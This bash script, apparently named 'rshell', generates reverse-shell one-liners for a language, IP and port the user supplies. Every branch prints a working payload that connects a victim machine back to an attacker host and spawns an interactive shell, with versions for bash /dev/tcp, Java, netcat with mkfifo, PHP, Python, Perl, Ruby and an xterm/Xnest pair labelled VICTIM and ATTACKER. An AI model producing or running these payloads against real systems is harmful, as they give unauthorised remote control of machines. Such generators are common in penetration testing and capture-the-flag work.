#!/bin/bash
if [[ $1 ]]; then
	LANG=$1
else
	echo "usage: rshell language [ip] [port]"
	exit 1
fi
if [[ $2 ]]; then
        IP=$2
else
        IP=$(echo $(ifconfig eth0 | grep -oP "inet \K\S+"))
fi
if [[ $3 ]]; then
        PORT=$3
else
        PORT=$((32000 + RANDOM % 30000))
fi
case "$LANG" in
	bash|Bash)
		echo "bash -i >& /dev/tcp/$IP/$PORT 0>&1"
		;;
	java|Java)
		cat << EOF
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/$IP/$PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
EOF
		;;
	nc|netcat|Netcat)
		cat << EOF
nc -e /bin/sh $IP $PORT
OR
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/f
EOF
		;;
	php|Php|PHP)
		cat << EOF
php -r '\$sock=fsockopen("$IP",$PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
EOF
		;;
	python|Python|py)
		cat << EOF
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",$PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
EOF
		;;
	perl|Perl)
		cat << EOF
perl -e 'use Socket;\$i="$IP";\$p=$PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\$p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
EOF
		;;
	ruby|Ruby)
		cat << EOF
ruby -rsocket -e'f=TCPSocket.open("$IP",$PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
EOF
		;;	
	xterm|Xterm)
		cat << EOF
VICTIM:
xterm -display $IP:1
ATTACKER:
# allow 6001 through the firewall
xhost +$IP
Xnest :1
EOF
		;;
	*)
		echo "$1 is not a language I have a reverse shell in."
		exit 1
		;;
esac
